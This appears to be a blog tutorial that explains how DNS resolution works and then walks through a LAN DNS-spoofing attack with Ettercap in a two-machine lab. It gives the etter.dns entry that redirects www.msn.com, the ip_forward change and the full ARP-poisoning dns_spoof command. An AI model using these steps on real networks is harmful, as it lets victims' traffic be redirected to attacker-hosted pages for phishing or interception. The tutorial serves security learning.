DNS stands for Domain Name System and it does the job of translating the name of websites you enter in the address bar into an IP address.
When you enter www.google.com into the address bar, it gets translated to the respective IP address and after that, a connection is established.
Here’s how the process goes:
1. You enter the hostname www.xyz.com into the address bar
2. Your computer searches for the IP in the local DNS cache. If it’s not found, a DNS query is performed.
3. The query is sent to recursive name servers – these are with your ISP and have their own cache.
4. If the recursive servers don’t have the answer, they will query the root nameserver.
5. The root nameserver will look at your request from right to left for TLD (.com , .in , .us)
6. The query is then directed to the top level domain (TLD) nameserver
7. The query is looked at (from right to left minus the TLD part) for specific domain.
8. Finally, the query goes to the authoritative DNS servers. These know everything there is to know about a domain. These have DNS records like – A, mx etc. and the recursive server will retrieve the record and give it back to you.
Common DNS records:
A = forward DNS lookup
MX = mail exchange record
PTR = reverse DNS lookup
What’s a nameserver?
A computer that’s permanently connected to the internet and translates a domain name into an IP address.
What’s Ettercap?
Ettercap is a free and open source network security tool for man-in-the-middle attacks on a LAN. It can be used for computer network protocol analysis and security auditing
Spoofing DNS using Ettercap
The victim will try to connect to msn.com and instead will see the attacker hosted webpage.
Scenario: 2 machines – Kali Linux and Windows 8
On Kali Linux
1. locate a file by the name etter.dns
#locate etter.dns
the file will be under /etc/ettercap
open the file using the nano editor
scroll down and you’ll ee a line
*wildcards in PTR are not allowed
there will be examples given and like them, add your entry.
for instance -> www.msn.com A 192.168.1.8
where A is the DNS record, and the IP is of your Kali Linux machine
ave and exit.
2. go to this directory
/proc/sys/net/ipv4
there will be a file by the name ip_forward.
open the file with nano and you’ll find that it’s set to 0. make it 1.
save and exit.
3. use the dns_spoof plugin of ettercap
# ettercap -T -q -M arp:remote -P dns_spoof //
and the plugin will start
(enter q to abort)
(enter ettercap –help to see options)
go to your Windows machine and ping the msn website.
you’ll see that reply being received is from 192.168.1.8 – the Kali machine – instead of the msn.com’s IP.
Smilarly, if you were to enter www.msn.com in the browser on Windows, you’ll be redirected to the Kali Linux machine where you can host your own page for malicious / non malicious intent.
All of this will make much more sense if you familiarize yourself with ARP spoofing.
No comments:
Post a Comment